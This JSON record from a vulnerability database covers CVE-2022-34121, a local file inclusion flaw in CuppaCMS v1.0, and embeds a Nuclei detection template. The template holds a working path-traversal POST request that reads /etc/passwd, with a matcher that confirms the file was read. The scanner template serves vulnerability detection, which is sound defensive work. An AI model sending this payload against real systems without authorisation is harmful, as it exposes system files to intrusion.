{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-34121/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-34121/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-34121/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-34121/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-34121/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-34121"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-34121"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-34121.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2022-34121\n\ninfo:\n  name: CuppaCMS v1.0 - Local File Inclusion\n  author: edoardottt\n  severity: high\n  description: |\n    Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n  remediation: |\n    Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.\n  reference:\n    - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates\n    - https://github.com/CuppaCMS/CuppaCMS/issues/18\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-34121\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2022-34121\n    cwe-id: CWE-829\n    epss-score: 0.03702\n    epss-percentile: 0.89312\n    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cuppacms\n    product: cuppacms\n  tags: cve,cve2022,lfi,cuppa,cms,cuppacms,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /templates/default/html/windows/right.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        url=../../../../../../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220032174252eed11fb1c7a2ea041d5f994743f6eadc1624dce1a75322919bb4a3b0221009cd69545864f58a44fbb3ffc924bce2297e5b2219a140ae897ecca956eb2bee8:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-34121"
}